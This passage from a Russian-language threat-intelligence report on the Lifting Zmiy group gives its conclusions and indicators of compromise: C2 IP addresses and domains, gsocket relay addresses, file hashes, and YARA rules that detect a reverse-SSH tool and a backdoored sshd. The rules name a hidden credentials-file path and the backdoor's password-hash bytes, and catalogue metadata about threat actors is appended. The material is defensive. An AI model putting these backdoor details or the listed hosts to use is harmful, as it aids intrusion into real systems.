публично взяли на себя ответственность за взлом организации из первого кейса в одном\r\nиз своих телеграм-каналов.\r\nСогласно whois-записи одного из доменов, используемого Lifting Zmiy для распространения своего ВПО, он был\r\nзарегистрирован с помощью украинского регистратора:\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 15 of 21\n\nКроме того, важной частью расследования кейса №4 стало обнаружение интересной подсети IP-адресов, с которых\r\nвелись подключения злоумышленников к инфраструктуре жертвы.\r\nWhois-запись IP адреса, с которого осуществлялось подключение атакующих\r\nСогласно Whois записям обнаруженных IP-адресов, они относятся к провайдеру Starlink Services, LLC, который\r\nявляется подразделением компании SpaceX и предоставляет услуги широкополосного спутникового интернета по\r\nвсему миру.\r\nЗаключение\r\nНа момент нашего исследования группа Lifting Zmiy по-прежнему проявляет высокую активность. Используя\r\nвнутренние хантинг-системы, мы постоянно находим новые элементы их инфраструктуры. Несмотря на\r\nиспользование злоумышленниками широкого набора различных публично доступных инструментов при проведении\r\nатак, Lifting Zmiy демонстрирует достаточно высокий уровень понимания принципов функционирования ОС Linux,\r\nумело скрывая развернутое ВПО.\r\nВ расследованных нами кейсах инфраструктуру взламывали путем обычного перебора паролей. Сложно сказать,\r\nсамостоятельно ли Lifting Zmiy накапливали доступы в разные организации или купили их у злоумышленников,\r\nпромышляющих продажей скомпрометированных учетных данных. Но во всех случаях с момента первоначальной\r\nкомпрометации и до начала активных действий проходило много времени (иногда несколько месяцев). Это может\r\nуказывать на то, что учетные данные все-таки были приобретены группировкой у третьих лиц.\r\nМы визуализировали на таймлайне наиболее значимые инструменты, техники и объекты сетевой инфраструктуры\r\nLifting Zmiy, по которым выстроили пересечения между инцидентами в расследованной цепочке атак.\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 16 of 21\n\nОсновная цель Lifting Zmiy — хищение чувствительных данных. Если же интересующая информация уже получена\r\nлибо группа понимает, что продвинуться дальше по инфраструктуре у них не получится, они приступают к\r\nуничтожению инфраструктуры, как это было в первом кейсе.\r\nВ целом использованный группой инструментарий и получение доступа путём перебора паролей в очередной раз\r\nподчеркивает необходимость внедрения, а главное, соблюдения базовых принципов информационной безопасности,\r\nтаких как строгие парольные политики, двухфакторная аутентификация и другие.\r\nIOCs\r\nС2\r\n213.87.14[.]102\r\n104.255.66[.]139\r\n79.120.62[.]218\r\n79.111.117[.]174\r\n79.111.233[.]34\r\n176.192.57[.]122\r\n176.192.49[.]226\r\n195.158.232[.]2\r\n89.22.156[.]31\r\n178.22.51[.]74\r\n46.160.189[.]123\r\n178.213.207[.]91\r\n46.160.189[.]124\r\n158.160.5[.]218\r\n206.119.171[.]140\r\n108.181.165[.]94\r\n179.60.149[.]42\r\n179.60.149[.]78\r\n194.190.152[.]129\r\n176.120.67[.]40\r\n79.120.38[.]38\r\n176.192.20[.]118\r\n176.192.114[.]82\r\n188.35.20[.]137\r\n178.173.26[.]69\r\n176.107.13[.]143\r\nurler[.]site\r\nlocalzilla[.]fun\r\nsensor[.]fun\r\nАдреса Global Socket Relay Network\r\nПримечание: адреса ниже добавлены в качестве индикаторов, так как их использует ПО gsocket, которое по\r\nнашим данным не эксплуатируется в легитимных целях.\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 17 of 21\n\n135.125.107[.]221\r\n192.145.44[.]201\r\n75.119.130[.]76\r\n213.171.212[.]212\r\nИспользуемая инфраструктура\r\nПримечание: ниже представлен список IP-адресов, с которых наблюдались удаленные подключения Lifting Zmiy к\r\nскомпрометированной инфраструктуре. Такие адреса зачастую относятся к общедоступным публичным сервисам,\r\nпоэтому их нельзя напрямую атрибутировать к группе и заносить в стоп-листы, но можно поставить на\r\nмониторинг.\r\n104.255.68[.]20\r\n104.255.68[.]70\r\n138.199.53[.]226\r\n138.199.53[.]231\r\n145.224.121[.]64\r\n145.224.123[.]25\r\n145.224.123[.]55\r\n146.70.161[.]163\r\n154.47.19[.]194\r\n156.146.50[.]1\r\n156.146.55[.]226\r\n165.231.178[.]25\r\n176.96.226[.]227\r\n176.96.226[.]243\r\n176.96.226[.]245\r\n178.213.207[.]9\r\n185.183.33[.]220\r\n188.120.228[.]112\r\n194.190.152[.]81\r\n195.14.123[.]51\r\n209.198.130[.]120\r\n216.131.109[.]143\r\n45.153.231[.]21\r\n45.78.6[.]136\r\n45.78.7[.]135\r\n45.78.7[.]88\r\n5.8.16[.]170\r\n5.8.16[.]236\r\n62.112.9[.]165\r\n82.118.29[.]80\r\n84.252.114[.]1\r\n85.132.252[.]35\r\n85.203.39[.]227\r\n87.249.133[.]98\r\n89.39.107[.]200\r\n91.90.123[.]179\r\n92.63.100[.]23\r\n94.137.92[.]1\r\n98.159.226[.]65\r\n98.159.226[.]72\r\n98.159.226[.]73\r\n98.159.226[.]78\r\nFile hashes\r\nMD5\r\n723dfe3dc3e74d16809700b5ece2b28a\r\n1c2c53c430f54f59045c63c02fe774fd\r\nbfce45ed17f9b778a7e2b1f4832c0ea5\r\n728e9466e1c57fcba49d7d14a95ab851\r\nbf0aa35ce8ce1ef1155607e57e0227c3\r\n86f49b35cab2b9ccf7fa306a3067dbde\r\n41b99b0770f01afbd80481fb6f811bcc\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 18 of 21\n\n0abcc1d8d85c160a8e6b714045d028ca\r\n9764cf6862afdb88d24dd305d1226d73\r\ne930f5b02e5d20a6841ab86893c3dd96\r\n0b4dd8e23fecb00f6d718db1c937be0d\r\ne68a4c4969eb6a3bd14d68a2095ea212\r\nSHA1\r\n5419d3907fbe5e08c8e92bfb9e7d13598624c37e\r\n13199beae514d13cf50365678a2a015166912725\r\n3ce493ffadd427645417913c3fc4a48546a9a05c\r\nb4916f2b61a5a71e01c64061420844f33633455a\r\n223d99f7f0c90d8b4eeace2ac59a71b8a1f410a6\r\nd9fab70cb02ea5437eb1287eedeb6e7ebbdeb0f0\r\n58ee2fb1672b3af2db7997bb91cf3ab138d801e1\r\n3949004dbe27de39b22bd83d4d9ffdfa094ec54e\r\n15f892ce1ac9d483e4347521a5754908d1518287\r\n7fc45ff66f59dea79f107b472e9dae3b04725502\r\nef15bfb08ad93f3a1ce0c0ded1472937cb882f03\r\ne2ea2a3c5e2538cdd6ea97452d9ea291afb1eff1\r\nSHA256\r\n170e5dfe925e4065189a3708f3e565627b4def57bca550ad9c2a30f8c5a4c7f6\r\ncab22ba432a65c7db751e22a42f8a2079d3810312b24ecacccfd371bf514fe2d\r\n4dc5c2c0a31713d668ee8950cfef5e01800aa7c9fbcfa3467b8d10d1fe84179a\r\n7d8540d7dde17e8f836e2cc04e79784dbbd713db5bf0f7b9356d5a2dcceec21f\r\ncb5f62bf7b591e69bd38e6bf8e40e8d307d154b2935703422d44f02e403d2e78\r\ncfc0ef98f7ede78059a2f794668cdb626c668511b25a75edef2d7ac72e5a3809\r\nd457b15dfcdd6669d60af6d96f56757674b6f0fbba11999f76f47e03bd635d09\r\n62a7a561000c6686b338dfbc70309561a05300eeb71d9108c6d6d22a8d0bec6c\r\nf893f73b879cf12b2ce821ea65465031ae6f30f7dc0c97c7e0acfc0d926dd92b\r\n0fae988b21c2cdaceeeabfba154b6239b7069092a009be25b05dfc29778159b9\r\nab9bca283072c637d56bc17d9b59c054a0e0d83d157ecf539e0f3dc50ddd88e3\r\n2555ca7597171a0fc8ff75015e7e1d03c7ca5a632907640de65c6084d635b3a9\r\nYara\r\n \r\nrule ReverseSSH {\r\n meta:\r\n description = \"Detects golang Reverse ssh tool\"\r\n author = \"Solar 4RAYS\"\r\n md5 = \"0abcc1d8d85c160a8e6b714045d028ca\"\r\n md5 = \"9764cf6862afdb88d24dd305d1226d73\"\r\n md5 = \"e930f5b02e5d20a6841ab86893c3dd96\"\r\n md5 = \"0b4dd8e23fecb00f6d718db1c937be0d\"\r\n md5 = \"e68a4c4969eb6a3bd14d68a2095ea212\"\r\n \r\n strings:\r\n $s1 = \"/NHAS/reverse_ssh/internal/client\" ascii\r\n condition:\r\n all of them\r\n}\r\n \r\n \r\nrule apt_LiftingZmiy_xorkey {\r\n meta:\r\n description = \"detects xor key (also used as md5 password hash for login) used in backdoored ssh\"\r\n author = \"Solar 4RAYS\"\r\n md5= \"1c2c53c430f54f59045c63c02fe774fd\" // backdoored ssh ELF\r\n strings:\r\n $ = { D8 48 C0 FB 4A 83 8E 85 13 0D B4 86 61 B7 42 F1 }\r\n condition:\r\n any of them\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 19 of 21\n\n}\r\n \r\n \r\nrule apt_LiftingZmiy_backdoored_ssh {\r\n meta:\r\n description = \"Detects backdoored ssh + libprivatessh.so.5 files\"\r\n author = \"Solar 4RAYS\"\r\n md5 = \"1c2c53c430f54f59045c63c02fe774fd\" // backdoored ssh ELF\r\n md5 = \"723dfe3dc3e74d16809700b5ece2b28a\" // backdoored libprivatessh.so.5\r\n \r\n strings:\r\n $creds_file = \"/var/mail/.../.,\"\r\n $pass_md5 = { D8 48 C0 FB 4A 83 8E 85 13 0D B4 86 61 B7 42 F1 }\r\n $s1 = \"unicorn\"\r\n $s2 = \"sshlog_su\"\r\n condition:\r\n uint32(0) == 0x464c457f and\r\n filesize \u003c 800KB and\r\n ($pass_md5 or $creds_file or all of ($s*))\r\n}\r\n \r\nПриложение. Расширенная информация по файловым IOCs\r\nПримечание: большинство образцов Reverse SSH были извлечены из оперативной памяти, поэтому для точного\r\nопределения файлов, предлагаем использовать наше Yara-правило.\r\nИмя файла MD5 SHA1 SHA256\r\nlibprivatessh.so.5 723dfe3dc3e74d16809700b5ece2b28a 5419d3907fbe5e08c8e92bfb9e7d13598624c37e 170e5dfe925e4065189a3708f3e56\r\nsshd 1c2c53c430f54f59045c63c02fe774fd 13199beae514d13cf50365678a2a015166912725 cab22ba432a65c7db751e22a42f8\r\n1 bfce45ed17f9b778a7e2b1f4832c0ea5 3ce493ffadd427645417913c3fc4a48546a9a05c 4dc5c2c0a31713d668ee8950cfef5\r\nrs 728e9466e1c57fcba49d7d14a95ab851 b4916f2b61a5a71e01c64061420844f33633455a 7d8540d7dde17e8f836e2cc04e79\r\ngs-dbus bf0aa35ce8ce1ef1155607e57e0227c3 223d99f7f0c90d8b4eeace2ac59a71b8a1f410a6 cb5f62bf7b591e69bd38e6bf8e40e\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 20 of 21\n\ndocument.docx.exe 86f49b35cab2b9ccf7fa306a3067dbde d9fab70cb02ea5437eb1287eedeb6e7ebbdeb0f0 cfc0ef98f7ede78059a2f794668cdb\r\ntiago.exe 41b99b0770f01afbd80481fb6f811bcc 58ee2fb1672b3af2db7997bb91cf3ab138d801e1 d457b15dfcdd6669d60af6d96f567\r\n- 0abcc1d8d85c160a8e6b714045d028ca 3949004dbe27de39b22bd83d4d9ffdfa094ec54e 62a7a561000c6686b338dfbc7030\r\n- 9764cf6862afdb88d24dd305d1226d73 15f892ce1ac9d483e4347521a5754908d1518287 f893f73b879cf12b2ce821ea65465\r\n- e930f5b02e5d20a6841ab86893c3dd96 7fc45ff66f59dea79f107b472e9dae3b04725502 0fae988b21c2cdaceeeabfba154b6\r\n- 0b4dd8e23fecb00f6d718db1c937be0d ef15bfb08ad93f3a1ce0c0ded1472937cb882f03 ab9bca283072c637d56bc17d9b59\r\n176.192.20.118 e68a4c4969eb6a3bd14d68a2095ea212 e2ea2a3c5e2538cdd6ea97452d9ea291afb1eff1 2555ca7597171a0fc8ff75015e7e1\r\nSource: https://rt-solar.ru/solar-4rays/blog/4506/\r\nhttps://rt-solar.ru/solar-4rays/blog/4506/\r\nPage 21 of 21\n\nна скомпрометированном C2 оборудовании: ASN Начало активности\n79.120.62[.]218 AS12714 декабрь 2023\n79.111.117[.]174 AS12714 декабрь 2023\n79.111.233[.]34 AS12714 декабрь 2023\n Page 12 of 21\n\nmd5= \"1c2c53c430f54f59045c63c02fe774fd\" strings: // backdoored ssh ELF\n$ = { D8 48 C0 FB 4A 83 8E 85 13 0D B4 86 61 B7 42 F1 }\ncondition: \nany of them \n Page 19 of 21", "extraction_quality": 1, "language": "RU", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://rt-solar.ru/solar-4rays/blog/4506/" ], "report_names": [ "4506" ], "threat_actors": [ { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "fad4b64a-4447-459c-b6b4-f50040008d5a", "created_at": "2024-07-21T02:00:04.74537Z", "updated_at": "2026-04-10T02:00:03.674212Z", "deleted_at": null, "main_name": "Lifting Zmiy", "aliases": [], "source_name": "MISPGALAXY:Lifting Zmiy", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-10T02:00:03.101635Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "Stately Taurus", "LuminousMoth", "TANTALUM", "Twill Typhoon", "TEMP.HEX", "Earth Preta", "Polaris", "BRONZE PRESIDENT", "HoneyMyte", "Red Lich", "TA416" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c7d9878a-e691-4c6f-81ae-84fb115a1345", "created_at": "2022-10-25T16:07:23.359506Z", "updated_at": "2026-04-10T02:00:04.556639Z", "deleted_at": null, "main_name": "APT 41", "aliases": [ "BrazenBamboo", "Bronze Atlas", "Double Dragon", "Earth Baku", "G0096", "Grayfly", "Operation ColunmTK", "Operation CuckooBees", "Operation ShadowHammer", "Red Kelpie", "SparklingGoblin", "TA415", "TG-2633" ], "source_name": "ETDA:APT 41", "tools": [ "9002 RAT", "ADORE.XSEC", "ASPXSpy", "ASPXTool", "AceHash", "Agent.dhwf", "Agentemis", "AndroidControl", "AngryRebel", "AntSword", "BLUEBEAM", "Barlaiy", "BlackCoffee", "Bladabindi", "BleDoor", "CCleaner Backdoor", "CHINACHOPPER", "COLDJAVA", "China Chopper", "ChyNode", "Cobalt Strike", "CobaltStrike", "Crackshot", "CrossWalk", "CurveLast", "CurveLoad", "DAYJOB", "DBoxAgent", "DEADEYE", "DEADEYE.APPEND", "DEADEYE.EMBED", "DEPLOYLOG", "DIRTCLEANER", "DUSTTRAP", "Derusbi", "Destroy RAT", "DestroyRAT", "DodgeBox", "DragonEgg", "ELFSHELF", "EasyNight", "Farfli", "FunnySwitch", "Gh0st RAT", "Ghost RAT", "HDD Rootkit", "HDRoot", "HKDOOR", "HOMEUNIX", "HUI Loader", "HidraQ", "HighNoon", "HighNote", "Homux", "Hydraq", "Jorik", "Jumpall", "KEYPLUG", "Kaba", "Korplug", "LATELUNCH", "LOLBAS", "LOLBins", "LightSpy", "Living off the Land", "Lowkey", "McRAT", "MdmBot", "MessageTap", "Meterpreter", "Mimikatz", "MoonBounce", "MoonWalk", "Motnug", "Moudour", "Mydoor", "NTDSDump", "PACMAN", "PCRat", "PINEGROVE", "PNGRAT", "POISONPLUG", "POISONPLUG.SHADOW", "POTROAST", "PRIVATELOG", "PipeMon", "PlugX", "PortReuse", "ProxIP", "ROCKBOOT", "RbDoor", "RedDelta", "RedXOR", "RibDoor", "Roarur", "RouterGod", "SAGEHIRE", "SPARKLOG", "SQLULDR2", "STASHLOG", "SWEETCANDLE", "ScrambleCross", "Sensocode", "SerialVlogger", "ShadowHammer", "ShadowPad Winnti", "SinoChopper", "Skip-2.0", "SneakCross", "Sogu", "Speculoos", "Spyder", "StealthReacher", "StealthVector", "TERA", "TIDYELF", "TIGERPLUG", "TOMMYGUN", "TVT", "Thoper", "Voldemort", "WIDETONE", "WINNKIT", "WINTERLOVE", "Winnti", "WyrmSpy", "X-Door", "XDOOR", "XMRig", "XShellGhost", "Xamtrav", "ZXShell", "ZoxPNG", "certutil", "certutil.exe", "cobeacon", "gresim", "njRAT", "pwdump", "xDll" ], "source_id": "ETDA", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-10T02:00:03.645565Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-10T02:00:05.310361Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434687, "ts_updated_at": 1775792193, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f5d12ac3a3301f6d56baf0f3de78faebbef3ecf9.pdf", "text": "https://archive.orkl.eu/f5d12ac3a3301f6d56baf0f3de78faebbef3ecf9.txt", "img": "https://archive.orkl.eu/f5d12ac3a3301f6d56baf0f3de78faebbef3ecf9.jpg" } }